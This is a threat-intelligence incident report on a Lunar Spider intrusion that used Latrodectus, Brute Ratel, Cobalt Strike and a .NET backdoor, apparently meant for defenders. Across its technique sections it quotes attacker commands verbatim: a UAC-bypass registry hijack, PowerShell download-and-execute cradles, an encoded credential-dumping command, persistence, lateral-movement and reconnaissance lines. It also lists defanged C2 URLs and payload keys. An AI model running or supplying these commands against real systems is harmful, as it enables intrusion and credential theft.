From A Single Click: How Lunar Spider Enabled A Near Two Month Intrusion

Key Takeaways

  • The intrusion began with a Lunar Spider linked JavaScript file disguised as a tax form that downloaded and executed Brute Ratel via a MSI installer.
  • Multiple types of malware were deployed across the intrusion, including Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor.
  • Credentials were harvested from several sources like LSASS, backup software, and browsers, and also a Windows Answer file used for automated provisioning.
  • Twenty days into the intrusion data was exfiltrated using Rclone and FTP.
  • Threat actor activity persisted for nearly two months with intermittent command and control (C2) connections, discovery, lateral movement, and data exfiltration.

This case was featured in our September 2025 DFIR Labs Forensics Challenge and is available as a lab today here for one time access or included in our new subscription plan. It was originally published as a Threat Brief to customers in Feb 2025

The DFIR Report Services

  • Private Threat Briefs: 20+ private DFIR reports annually.
  • Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.
  • All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor Insights reports, long-term tracking, data clustering, and other curated intel.
  • Private Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT&CK with test examples.
  • DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.

Contact us today for pricing or a demo!

Table of Contents:

 

  • Case Summary

    The intrusion took place in May 2024, when a user executed a malicious JavaScript file. This JavaScript file has been previously reported as associated with the Lunar Spider initial access group by EclecticIQ. The heavily obfuscated file, masquerading as a legitimate tax form, contained only a small amount of executable code dispersed among extensive filler content used for evasion. The JavaScript payload triggered the download of a MSI package, which deployed a Brute Ratel DLL file using rundll32.

    The Brute Ratel loader subsequently injected Latrodectus malware into the explorer.exe process, and established command and control communications with multiple CloudFlare-proxied domains. The Latrodectus payload was then observed retrieving a stealer module. Around one hour after initial access, the threat actor began reconnaissance activities using built-in Windows commands for host and domain enumeration, including ipconfig, systeminfo, nltest, and whoami commands.

    Approximately six hours after initial access, the threat actor established a BackConnect session, and initiated VNC-based remote access capabilities. This allowed them to browse the file system and upload additional malware to the beachhead host.

    On day three, the threat actor discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials left over from an automated deployment process. This provided the threat actor with immediate high-privilege access to the domain environment.

    On day four, the threat actor expanded their activity by deploying Cobalt Strike beacons. They escalated privileges using Windows’ Secondary Logon service and the runas command to authenticate as the domain admin account found the prior day. The threat actor then conducted extensive Active Directory reconnaissance using AdFind. Around an hour after this discovery activity they began lateral movement. They used PsExec to remotely deploy Cobalt Strike DLL beacons to several remote hosts including a domain controller as well as file and backup servers.

    They then paused for around five hours. On their return, they deployed a custom .NET backdoor that created a scheduled task for persistence and setup an additional command and control channel. They also dropped another Cobalt Strike beacon that had a new command and control server. They then used a custom tool that used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement to a second domain controller. After that they then tried to execute Metasploit laterally to that domain contoller via a remote service. However they were unable to establish a command and control channel from this action.

    On day five, the threat actor returned using RDP to access a new server that they then dropped the newest Cobalt Strike beacon on. This was then followed by an RDP logon to a file share server where they also deployed Cobalt Strike. Around 12 hours after that they returned to the beachhead host and replaced the BruteRatel file used for persistence with a new BruteRatel badger DLL. After this there was a large gap before their next actions.

    Fifteen days later, the 20th since initial access, the threat actor became active again. They deployed a set of scripts to execute a renamed rclone binary to exfiltrate the data from the file share server. This exfiltration used FTP to send data over a roughly 10 hour period to the threat actor’s remote host. After this concluded there was another pause in threat actor actions.

    On the 26th day of the intrusion the threat actor returned to the backup server and used a PowerShell script to dump credentials from the backup server software. Two days later on the backup server they appeared again and dropped a network scanning tool, rustscan, which they used to scan subnets across the environment. After this hands on activity ceased again.

    The threat actor maintained intermittent command and control access for nearly two months following initial compromise, leveraging BackConnect VNC capabilities and multiple payloads, including Latrodectus, Brute Ratel, and Cobalt Strike, before being evicted from the environment. Despite the extended dwell time and comprehensive access to critical infrastructure, no ransomware deployment was observed during this intrusion.

    If you would like to get an email when we publish a new report, please subscribe here.

    Analysts

    Analysis and reporting completed by @RussianPanda9xx, Christos Fotopoulos, Salem Salem, reviewed by @svch0st.

    Initial Access

    The infection began with the execution of a Latrodectus JavaScript file, Form_W-9_Ver-i40_53b043910-86g91352u7972-6495q3.js, first reported on X by @Cryptolaemus1 in the following post:

    5d560f23fd28bc25612d53630230ff0238000d0878bd0a97bc0e5505b3749a50

    The malware was first uploaded to VirusTotal on May 9, 2024, prior to Operation Endgame. This operation occurred between May 27 and 29, 2024, during which law enforcement dismantled multiple botnets, including Latrodectus.

    58c54814b8ca6aaf0826a84ae702db8ca73ab0615f867cba786db9d42b95fa18

    After the take down of the botnet, Latrodectus reappeared in June 2024, using tax-themed phishing campaigns as its initial access mechanism that dropped Latrodectus version 1.3 along with Brute Ratel, according to this article by Trustwave.

    Although our sample was from May and its file name was related to a W-9 tax form, it was version 1.3 of the malware and additionally it utilized Brute Ratel. Based on that, we believe it to be an early version of the campaign that was used later in June. 

    This report from Rapid7, also from June 2024, shows a malicious ad as the initial access used to lure a victim to download the malicious Javascript file. Given the similarity of that report and our initial malware behavior we assess that this we likely the same method used for our case as well.

    The heavily obfuscated JS file contained multiple lines starting with //, which included filler text. After further analyzing the file, a deobfuscation workflow was identified, executing all the lines of code starting with ////.

    ad625439382295f63facfc20ab11c65008293c734e1fe16afac7751b804ea8b3
    Raw Script
    e8ea839ff02d4a421f25078c9083174c7ce17b2ec9f3a716dc34a4d55cb518ab
    Stage 1
    6226b23470bff5189cbefcf346ee8244503c8b1abe721cd2cbc5be4002f7b52f
    Stage 2

    Deobfuscating the Latrodectus malware, uncovered that it performed an HTTP request to the URL hxxp://91.194.11[.]64/MSI.msi to install the next stage, thus triggering the Suricata rule from Emerging Threats ET POLICY Observed MSI Download.

    Execution

    36da96158a29aeca837684d770bd8f0042938a6289ed96096edda9870151de93

    Static analysis of the MSI package revealed that upfilles.dll was embedded within the compressed disk1.cab archive. The MSI installer utilized a custom action to execute the DLL via the legitimate Windows binary rundll32.exe, specifically invoking the exported function stow to initiate malicious execution.

    4e3dfdd3c84f2f4f8173f71041beb61d42098df1fe8cea0fd1481f8309fabf76

    Brute Ratel

    On day one, the loader upfilles.dll began execution on the beachhead host by resolving three APIs (VirtualAlloc, LoadLibraryA, GetProcessAddress) via the following hashing algorithm:

     for char in api_name: char_byte = ord(char) # Converts to lowercase, adds current hash temp = (char_byte | 0x60) + hash_value # Double for position-dependent hash hash_value = 2 * temp return hash_value
    9b9f2404fd47464fe71375fef567d1548fa214e1aaaf50977ec0ee542885fe81
    Hashing algorithm

    Then it decrypted the intermediary Brute Ratel payload via an XOR decryption algorithm using the embedded key:

    21 79 3C 7A 39 5F 3E 24 54 4A 7A 35 6C 33 3E 32 5F 66 74 76 6D 59 3C 4D 00 
    836df7c67c59bfbc894c751073ff5e5db956b4b2d309846814b192feb29c7153
    The encrypted intermediary BRC4 payload

    The shellcode above then decrypted the BRC4 badger via the RC4 key 71 24 70 2C 7D 70 61 3F. Below are the decrypted Brute Ratel C4 (BRC4) C2s and RC4 key to decrypt the gathered information on the infected system that is sent to the C2.

    a03c93e772b5c29f81a99d404e15876b2799c26fe1ac1fd0c1026c671fcb7846
    Decrypted BRC4 C2s and the RC4 key

    The subsequent YARA rule triggered during a scan of the process memory for Brute Ratel:

    2c26477f80625ce7cfa7579a66260710cfa9f8eeb58f65d953e11ceb4e41f09e

    On day five, the threat actor deployed a new Brute Ratel DLL through the established BackConnect session:

    rundll32 wscadminui.dll, wsca

    The wscadminui.dll file serves as the Brute Ratel badger payload, maintaining the same obfuscation patterns established by the upfilles.dll loader. Decryption of the intermediary BRC4 payload is achieved through XOR operations using the embedded key sequence 75 36 58 33 64 4F 61 3F 4B 59 23 42 77 42 6F 41 39 6D 6E 4E 5E 46 56 47 66 41 00.

    Latrodectus

    After executing, Brute Ratel deployed Latrodectus malware through process injection into explorer.exe leveraging CreateRemoteThread API. Latrodectus, a downloader first identified by Proofpoint researchers in November 2023, is attributed to the same threat actors responsible for developing IcedID.

    8b49bb65a40a09ed72ed32064a80c78ab8ed3a1e071f5c5e5e768aadfa7a0e5a
    Latrodectus being injected into explorer.exe

    Approximately six hours later, the process running Latrodectus established a connection to 193.168.143[.]196 on the beachhead host, which we suspect to have been a BackConnect C2 server. BackConnect is a post-compromise module that was initially deployed by IcedID, allowing threat actors to leverage infected systems for remote access through VNC modules. Multiple security researchers, such as Elastic Security Labs, hypothesize that Latrodectus is a potential successor to IcedID, due to code reuse and behavioral similarities, including the use of the same commands in the Discover flag.

    An hour after this traffic started, the following command was executed to switch to UTF-8 encoding:

    cmd.exe /K chcp 65001 && c: && cd c:\

    This command was previously observed in Keyhole, a multi-functional VNC/BackConnect component used by IcedID, and prior cases involving IcedID infection.

    A few minutes later, Latrodectus spawned DLLHost.exe to likely inject the BackConnect payload with PROCESS_ALL_ACCESS (0x1fffff) access rights. The granted access rights provide full control over the target process, enabling memory manipulation, thread creation, and DLL injection capabilities.

    14fda0cfe780d4119e3323f08d07aa6714ad547d6b7b907a47c99516d4924cf7

    lsassa.exe Backdoor

    On day four, the threat actor deployed and executed a binary named lsassa.exe via BackConnect on the beachhead host.

    5934ec23d4df1ed81dae09a014701a8f8624909ca6524460d6f0b83e1373b939
    Threat actor dropping lsassa.exe via BackConnect session

    The lsassa.exe file was a .NET backdoor that contained an encrypted payload embedded in an assembly resource file named lsassa&&. Inside this resource, a small header was present declaring which protections were used (encryption and/or compression). If encryption is used, it either uses a key embedded in the file or derives one from the assembly’s public key token, then decrypts the payload. If compression is enabled, the code decompresses the decrypted data before loading it.

    The backdoor implemented a persistent command and control system that establishes covert communication between an infected machine and a remote threat actor controlled server while creating a scheduled task for persistence. Upon initialization, the backdoor establishes a timer-based polling mechanism that triggers every 250 seconds to maintain regular contact with the C2 infrastructure and uses extracted obfuscated strings to construct the command. In our case, the threat actor leveraged the backdoor to create a scheduled task on the beachhead host with the command:

    "cmd.exe" /c schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc onstart

    During each communication cycle, the backdoor collects basic system reconnaissance data, including the username and machine name of the infected host, then transmits it to a remote server endpoint. The server C2 (hxxps://cloudmeri.com/comm[.]php) was obfuscated and embedded within the resource file name lsassa$ from the decrypted resource file lsassa&&. After successfully transmitting the victim data, the backdoor waits for a server response containing executable commands.

    When commands are received from the remote server, the backdoor validates that the response content is not empty and executes the payload through the Windows command interpreter. The execution occurs by spawning a new cmd.exe process with the UseShellExecute flag disabled and CreateNoWindow enabled to maintain stealth, while redirecting standard output and error streams to capture results. The backdoor includes a special termination command that allows the remote operator to exit the backdoor by calling Environment.Exit when a specific response string is received.

    b88f46f1c33aeb3532a400447e9443e04484c4d86f3e1faf9b861427e7fe6dff
    Snippet of code showing the backdoor’s command and control communication function that collects system information and transmits it to a remote server while awaiting executable commands

    The backdoor conceals its strings in an encrypted resource and only reveals them at runtime. The extraction function first reads a length value to determine how many bytes to pull, then converts those bytes into readable text using Unicode encoding.

    7feed85d739020d81bde9ee329a23894ad72001d2a98d1836c068da4304be857
    String extraction function that uses variable-length encoding to decode obfuscated strings from the decrypted resource data array

    Cobalt Strike

    Several Cobalt Strike beacons were utilized over the course of the intrusion. The first was observed on day four, where the cron801.dl_ file was dropped on the beachhead host under C:\ProgramData from the injected explorer.exe process containing Latrodectus and was then executed twice by leveraging BackConnect.

    rundll32 cron801.dl_,lvQkzdrFdILT
    cea90cb5aeb3d465e9b4661b7465847c3868ff4e501788638d289380535682aa
    BackConnect launching Cobalt Strike payload (pcap)

    The outbound connection was established with the Cobalt Strike server at hxxp://45.129.199[.]214/vodeo/wg01ck01.

    55ba971b78f78743bb5f48d70efd12cc6a1c741731f07c6b333d2fa4bfec0589

    Shortly after, the Cobalt Strike beacon spawned from rundll32.exe was injected into sihost.exe process.

    f0e164d015486ad5e5b2a8a849515cebe5bc375c91b34e35b38bcf0c8ad2a185

    Analysis of network traffic revealed a JSON response containing minified Vuetify v3.0.3 JavaScript served by the Cobalt Strike C2 server. This discovery led to the identification of additional potentially related C2 servers using Virustotal searches for similar characteristics (JSON response content or the URL path /vodeo/):

    hxxp[://]94[.]232[.]40[.]49/vodeo/wg01ck01hxxps[://]techbulldigital[.]com/Apply/readme/VJICARU60DC?_WHBEXNIA=HNMIIIANEMPMLIDFEOPKLBDOEMPIhxxp[://]techbulldigital[.]com/List/com2/9O29EO3IRSBBhxxp[://]filomeruginfor[.]com/christian/house/cwk01hxxp[://]filomeruginfor[.]com/deolefor/wg01ck01mhxxps[://]wehelpgood[.]xyz/Complete/v9[.]56/KT84GVGD135Ehxxps[://]wehelpgood[.]xyz/derive/n/nzoqjd9mmehxxp[://]94[.]232[.]249[.]186/vodeo/vid_wg01ck01hxxp[://]94[.]232[.]249[.]186/vodeo/wg01ck01
    dc344e67f41f4f732df02c731b0b568cfcb24ab3f450c1290182f23775ede6f5
    JSON response from Cobalt Strike C2

    Later the cron801.dl_ file was renamed system.dl_ and deployed to several hosts, this is covered further in the Lateral Movement section

    Later on the same day, after the execution of the lsassa.exe backdoor, the threat actor dropped sys.dll. This was another Cobalt Strike stager containing shellcode that exhibits similarities to the payload documented in this report, via the BackConnect session on the beachhead host.

    cb9a17ad500f72bf04efbddb39fca68709022203158110d5ea17f0e603c5bd10

    The threat actor executed it via BackConnect with the command:

    rundll32 %ALLUSERSPROFILE%\sys.dll,StartUp471

    The Cobalt Strike implant initiated outbound communication to 206.206.123[.]209:443 (avtechupdate[.]com) before injecting itself into the sihost.exe process. After the attempted UAC bypass, the Cobalt Strike stager was executed in memory with the C2 pointing to resources.avtechupdate[.]com/samlss/vm.ico.

    9f900f67fe6d9f951ca8897a36ef57fdbb2cb840f7523b86adece7f851f5cb8e
    Snippet of Cobalt Strike stager
    9f63023a3b0731796c9c6a21fdea50bbe338d9a15988f6b1d637466e255f8762
    Speakeasy output from the extracted Cobalt Strike stager shellcode

    Shortly after, the sihost.exe process (containing an injected Cobalt Strike beacon) used RUNAS execution to create a new process (“gpupdate.exe”) running as the “Domain Admin” account, as described in the Privilege Escalation section.

    Subsequently, the compromised sihost.exe process, containing an injected Cobalt Strike beacon, leveraged the RUNAS command to spawn a new gpupdate.exe process under the domain admin account.

    3a0fe902a64fa158ca6d6c8a88386ddb8c2bfe2d7a1d86960fecce10dab0b45c
    sihost.exe spawning gpupdate.exe as “Domain Admin” user account

    The gpupdate.exe process then injected a Cobalt Strike beacon into the spoolsv.exe process space.

    81dea7ab07595820e19f19c1242337724b37eb76c272fc6dcb0bfdd19704dbb8

    Both spoolsv.exe and gpupdate.exe processes were observed creating named pipes consistent with Cobalt Strike communication patterns.

    4af6b5e2b44c2095de9f0bd85e8e9a661117c5e4ca3fd52957d0fe08c2761887
    Cobalt Strike named pipes

    The following day the sys.dll Cobalt Strike beacon was executed on two additional servers after connections to those hosts were made via RDP.

    Persistence

    Registry Run Key

    Persistence was first established after initial access on day one via a Registry Run key. This was achieved via the rundll32.exe process that created a Run key, with an innocuous name of Update, which would execute the Brute Ratel badger, upfilles.dll, if the system was restarted.

    91ebab03af2fce65086398ad02f961d4c7fbbeab4add6f7512f7fc1cca6dedad

    The Run key was updated multiple times during the intrusion to point to wscadminui.dll in place of upfilles.dll. We could not determine why the actor re-applied the same change on several occasions.

    bff491cea56007dbcad7d86a398a0473d902305ddc4c5bbc79684c4fcf1b7234

    Scheduled Tasks

    In addition to the Run key the threat actor created a scheduled task on the fourth day of the intrusion on the beachhead host. The scheduled task was created by lsassa.exe which has been explained in further detail in the Execution section.

    1b5348777cc1d45ff12f24d13147c8837b9b97c693cbdf6dcf584e7d73fe3516

    Privilege Escalation

    Runas

    The threat actor activated Windows’ Secondary Logon service to enable the runas command – a built-in Windows feature that allows running programs under different user credentials. By calling this service, they were able to authenticate as the domain admin account found in the unattend.xml file and escalate their privileges from a regular user to full administrative control over the network

    bdf4850412d9b8f9ef57b23dab1f1b828e6b01ca4ef480fe68450b640ec3d0da
    Starting the Secondary Logon service

    The Windows authentication log shows successful privilege escalation from a low-privileged user to a domain administrator account with elevated token permissions.

    3b903b17466cf8681aded2cb0e76384d20dd2c669f00168869b2a5bddaf3918c
    Windows security log showing privilege escalation from a low-privileged user to a domain admin

    UAC Bypass

    The Cobalt Strike sys.dll implant executed on the beachhead host initiated a UAC bypass using the elevate uac-token-duplication technique, a well-documented registry hijacking method first observed in 2017. This technique exploits the UAC token duplication vulnerability, allowing the Cobalt Strike implant to execute arbitrary code with privileges stolen from elevated processes, successfully achieving privilege escalation without user interaction.

    Initial registry modifications hijacked the ms-settings protocol handler to redirect Windows Settings calls to malicious PowerShell commands:

    reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')"reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /f /d "cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')"

    Privilege escalation occurred through execution of ComputerDefaults.exe, a trusted Windows binary that queries the hijacked ms-settings protocol with elevated privileges.

    With the elevated token duplicated from ComputerDefaults.exe, multiple PowerShell instances were executed to establish communication with the Cobalt Strike listener, indicating token rights restrictions requiring different execution approaches:

    "cmd.exe" /c powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')"powershell -nop -w hidden -c "IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:11664/')""C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

    Defense Evasion

    Process Injection

    The most common evasion technique that the threat actor utilized was process injection. During its execution, the Brute Ratel loader upfilles.dll launched the final stage of the Latrodectus malware inside the explorer’s memory.

    71d5819528ca9c52e7684e6692f6da62e7be5a8a4b50bd5a0093991f4ba78f46

    From the fourth day onward, the threat actor expanded their tooling and heavily utilized both Brute Ratel and Cobalt Strike for process injection. Using the Sysmon eventID 8, CreateRemoteThread, multiple instances of process injection were identified for both long-term and short-term sacrificial processes.

    c23c2576ec4949a0f3c25e68aac8bc04f132cd4e5bc4dd53796e6e940bb0bbf8

    After further investigating the process memory, YARA rules confirmed also the injection of Cobalt Strike beacons into multiple legitimate processes, such as spoolsv.exe.

    998b63547c0b5f2892682ac106cb55a654857d4c6ba94a59fd4ec88ee552d19d

    File Deletion

    Τhe threat actor also deleted files after using them, to cover their tracks and make the investigation more challenging. Specifically, they deleted more than half of the files and tools that had been downloaded on the compromised hosts.

    75e6155cdf2b8b06068dfdda3c60d6f872fae149a127e4818944d7695f642b7d

    Credential Access

    Latrodectus Stealer Module

    Using command ID 21, the Latrodectus-injected explorer.exe process downloaded the stealer module file fxrm_vn_9.557302425.bin from the C2 server.

    Analysis revealed that the stealer lacks functionality to decrypt cookies from current Chrome versions, suggesting the threat actor may not have updated their stealer module to accommodate recent browser security enhancements. The stealer had the hardcoded time of when the stealer module was built – 00:39:18 Mar 29 2024.

    Similar to the Latrodectus loader component, the stealer module dynamically resolved Windows APIs by iterating through the Process Environment Block (PEB) InLoadOrderModuleList, computing CRC32 hashes for each loaded module name, and comparing results against target hash values.

    The stealer was capable of harvesting credentials from 29+ Chromium-based browsers, including Google Chrome, Microsoft Edge, Yandex Browser, Vivaldi, Comodo Dragon, Orbitum, Epic Privacy Browser, and other variants. Firefox receives separate handling through profile enumeration targeting cookies.sqlite database files.

    During its execution, it extracted email credentials from Microsoft Outlook configurations across Office versions 11.0-17.0 by querying Windows registry keys. The stealer is also capable of harvesting server configurations including SMTP, POP3, IMAP, and NNTP server addresses, port numbers, usernames, and encrypted passwords. Additionally, it targeted the registry path HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles to extract legacy email configurations from older Windows Mail, Outlook Express, and MAPI profiles that may contain additional cached credentials. Internet Explorer credentials were obtained through COM interface manipulation, accessing the IntelliForms Storage2 system.

    The collected data is organized into distinct sections with the below headers:

    • cr_pass for Chrome passwords
    • ff_pass for Firefox data
    • ie_pass for Internet Explorer credentials
    • edge_pass for Edge data
    • outlook_pass for email configurations
    • _cookie variants for session data.

    Each section contains structured entries with pipe-delimited fields. The complete dataset undergoes base64-encoding. The stealer then creates a shared memory region named 12345 and stores a pointer to the encoded data, which could allow other processes to access the collected information.

    d2314b77cbe5bd3665cf76a6069b929ba561ace7f544f0be82b026b66ff4d80e
    Snippet of data collection code showing Firefox, IE, Edge, and Outlook extraction functions.

    Answer File Access

    Backconnect was used by the threat actor early in the campaign (day three) to list directories on the beachhead. After listing files in directories, the threat actor focused their attention on the file unattend.xml, an answer file. Answer files are used to control the configuration of Windows while setting it up from an image.

    One of the components of answer files is called Microsoft-Windows-UnattendedJoin which allows admins to easily domain join devices during setup, this is done by supplying plain text credentials (username and password) in the unattend.xml file. The threat actor collected the file via Backconnect (using the GET C:\Unattend.xml command) and was able to access the plain-text domain admin credentials stored in the file.

    a8dda3e51908f12eddffc038c149366c2425912becbfd4712ab7ff5e8d0d54d9

    LSASS Access

    The threat actor utilized their elevated user permissions to access the LSASS process on multiple devices in the environment.

    aeba603ace582da70e8058548a214eecd7807887d1e009cf336ee99862fb609f

    All instances of LSASS access followed the same pattern, the access was initiated by an injected process (either runonce.exe or gpupdate.exe) with a process requesting 0x1010 permissions and another instance of the same process requesting 0x1fffff seconds later. This cycle repeated three times in total during the intrusion, each time facilitated via a Cobalt Strike beacon process.

    Veeam-Get-Creds

    On day 26 of the intrusion, the threat actor ran the Veeam-Get-Creds.ps1 script from the injected spoolsv.exe process:

    powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAyADQAMAAwADMALwAnACkAOwAgAFYAZQBlAGEAbQAtAEcAZQB0AC0AQwByAGUAZABzAC4AcABzADEA

    which decoded to:

    IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:24003/'); Veeam-Get-Creds.ps1

    This technique has been previously observed by ransomware groups such as Noberus and Vice Society. It typically indicates the threat actor is targeting backup systems for destruction or virtualization infrastructure for encryption (commonly protected by Veeam backup solutions). The Veeam-Get-Creds.ps1 script is publicly available on GitHub.

    Upon executing the script, the threat actor would have obtained any plaintext usernames and passwords stored in the Veeam Credential Manager. These credentials are typically used to authenticate to remote systems for backup operations. Although in this intrusion, this execution was one of the final actions taken by the threat actor.

    Discovery

    Approximately one hour after Latrodectus was injected into explorer.exe, it began executing the following discovery commands on the beachhead host.

    ipconfig /allsysteminfonltest /domain_trustsnltest /domain_trusts /all_trustsnet view /all /domainnet view /allnet group "Domain Admins" /domainnet config workstationwmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedwhoami /groups

    Process activity related to discovery then went quiet until on day four, the injected Cobalt Strike beacon used systeminfo to query for system information. The threat actor then executed DISK command via BackConnect to query disk information.

    0d2d91ec1d668d28ace791c3b587e0ab6c5668ecad4ffa2333a828c76f07fa51
    DISK command execution via BackConnect session

    The Cobalt Strike injected processes then executed reconnaissance commands and leveraged AdFind for Active Directory enumeration activities:

    systeminfonltest /dclist:domain.localnet view REDACTEDnet user REDACTED /domaindir \\REDACTED\C$net group "domain admins" /domaindsquery subnetnltest /domain_trustsnltest /dsgetdc:domain.localwmic /node:REDACTED logicaldisk list brief

    AdFind Active Directory Enumeration:

    adfind.exe -f "(objectcategory=person)" >> ad_users.txtadfind.exe -f "objectcategory=computer" >> ad_computers.txt%Wadfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txtadfind.exe -subnets -f (objectCategory=subnet)> ad_subnets.txtadfind.exe -gcb -sc trustdmp > ad_trustdmp.txtadfind.exe -f "&(objectCategory=computer)(operatingSystem=*server*)" -csv > ad_servers.csv

    Continued Discovery and Network Testing:

    net view REDACTEDping -n 1 REDACTEDtype "\\REDACTED\C$\REDACTED\REDACTED.bat"

    The threat actor then tried to move AdFind outputs, but appeared to struggle based on the commands observed:

    C:\PerfLogs\*.* %ALLUSERSPROFILE%\move %ALLUSERSPROFILE%\ad_users.txt C:\REDACTED\move C:\REDACTED\ad_users.txt %PUBLIC%\ 

    While this was happening, they continued to issue more discovery commands and attempted to organize their AdFind output:

    net view REDACTEDwmic /node:REDACTED logicaldisk list brief %WINDIR%\system32\cmd.exe /C ping -n 1 REDACTEDmove %USERPROFILE%\ad_users.txt %USERPROFILE%\Pictures\ attrib %USERPROFILE%\Pictures\ad_users.txt

    The actor then expanded their reconnaissance to include DNS information while simultaneously troubleshooting file access issues on their collected data:

    dnscmd /zoneprint domain.localnetdom query SERVER >> serv.logattrib -a -s -h -r /s %USERPROFILE%\Pictures\ad_users.txtattrib %USERPROFILE%\Pictures\ad_users.txtattrib %USERPROFILE%\Pictures\*.*attrib -a +s +h -r /s %USERPROFILE%\Pictures\ad_users.txt

    b638fc396984b6d2b89628c022afac8bdb406f51a1e90fb225d767bd892598fb

    515427303c4e17150be3088a9ea94db83a86464cecdb1dc75c80cd28e533dd08
    Based on the BackConnect traffic capture, we observed that the threat actors did not have the proper access to the files.

    Minutes later, the compromised explorer.exe process spawned DllHost.exe, indicating resumption of the BackConnect VNC activity observed previously. The DllHost.exe process subsequently executed a Windows shell command to open the “This PC” interface on the beachhead host:

    cmd.exe /c start "" C:\Windows\explorer.exe shell:mycomputerfolder

    The session was then leveraged to attempt to view the AdFind results:

    "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\<username>\Pictures\ad_users.txt"

    The threat actor continued to encounter file permission issues, preventing them from accessing their own data. They attempted to resolve this by first setting the local user as the file owner, then switching to the domain account as owner, and when both ownership changes failed to provide adequate access, they finally used the /reset command to restore default permissions:

    icacls C:\Users\<username>\Pictures\ad_users.txt /setowner "<local user>" /T /Cicacls C:\Users\<username>\Pictures\ad_users.txt /setowner "<domain>\<local user>" /T /Cicacls "C:\Users\<username>\Pictures\ad_users.txt" /reset /T

    After running the Cobalt Strike beacons laterally on several hosts, the threat actor conducted remote user enumeration across domain systems using the following command from the beachhead host:

    quser <REDACTED HOSTNAME>

    The threat actor utilized the PowerView module Invoke-ShareFinder twice during the intrusion.

    IEX (New-Object Net.Webclient).DownloadString('hxxp://127.0.0[.]1:49157/'); Invoke-ShareFinder -CheckShareAccess -Verbose | Tee-Object ShareFinder.txt 

    Approximately 45 minutes following the Metasploit shell deployment attempt on the second domain controller, the threat actor initiated an additional round of AdFind reconnaissance from the beachhead host:

    AdFind.exe -b dc=domain,dc=local -f (objectcategory=person) > adflogs\domain.local_ad_users.txtAdFind.exe -b dc=domain,dc=local -f (objectcategory=computer) > adflogs\domain.local_ad_computers.txtAdFind.exe -b dc=domain,dc=local -f (objectcategory=organizationalUnit) > adflogs\domain.local_ad_ous.txtAdFind.exe dc=domain,dc=local -subnets -f (objectcategory=subnet) > adflogs\domain.local_ad_subnets.txtAdFind.exe -b dc=domain,dc=local -f (objectcategory=group) > adflogs\domain.local_ad_group.txt

    Although the threat actor attempted to compress the collected data, forensic analysis did not identify any created zip archives on the system.

    "7z.exe" a -mx1 -r0 adflogs.zip adflogs

    The threat actor returned 28 days after the initial access to run a final round of network scanning discovery. Operating from a backup server, the threat actor deployed the rustscan tool through the Cobalt Strike-injected spoolsv.exe process, first running rustscan with the help flag. The threat actor then began scanning various /16 and /8 network blocks for SMB services.

    rustscan.exe -a REDACTED/16 -p 445 --no-nmaprustscan.exe -a REDACTED/16 -p 445rustscan.exe -a REDACTED/8 -p 445"nmap -vvv -p 445 REDACTED"

    Lateral Movement

    WMI Remoting

    Although the threat actor ran discovery commands just under an hour from the initial access, the first lateral movement attempt came three days into the intrusion when the threat actor attempted to execute the system.dl_ Cobalt Strike beacon on a domain controller via WMIC remote execution. This execution was not successful as it was not observed on the domain controller.

    cc767642fd69aa4a7ebe36fd8efdc2194dfd8633263b26814a27b516cfdc8897

    Remote Services

    After the failed lateral movement attempt via WMIC, the threat actor pivoted to PsExec. The initial PsExec command also failed since the threat actor forgot to include the accepteula flag.

    e57f271d2b55d51560119a5fb31baa0e4774dfa94d227608e682f1afec608e67

    After fixing the forgotten EULA mistake, they were able to successfully execute system.dl_ on the domain controller via rundll32.

    a3ee90ad29ef7baf8705e503be9ec11bf340c1d5fc7eeda0a0dd94be11aa5d26

    The threat actor then proceeded to execute the same command on a file share server and backup server minutes after the domain controller execution.

    3f89217325925519e81f597b0720bda0d9f5a16221fb5ed2bed265e40f1b1a84

    3934430b1bd8150bb9c6f24f3f6a43a09d4c4968adc480a36d9562c8a80cbbd0

    Six hours after this initial lateral movement activity, the threat actor deployed and executed the zero.exe payload from C:\ProgramData on the beachhead. This payload, delivered via BackConnect session, was a custom implementation of the Zerologon vulnerability (CVE-2020-1472) exploit with capabilities for credential harvesting and remote code execution.

    8dd2cb5f3aeaf7b73321ba4268d611d93a627b2b1e17376b56d0bc7dee42e036
    zero.exe delivered via BackConnect

    During the intrusion the threat actor used zero.exe to move laterally between devices in the network. The executable was executed on the beachhead host and targeted a second domain controller, overall it was executed eight different times with a different username being used every execution. The execution used remote services to run code on lateral hosts.

    485d03656ef9551ffbf03fb52855d07c259c90453edec3e6ea955e554dbecc90

    3dc264b66aabfcedf384d3e0cf6b2e2f8968bf5555dc90f11f58f5be7d82cead

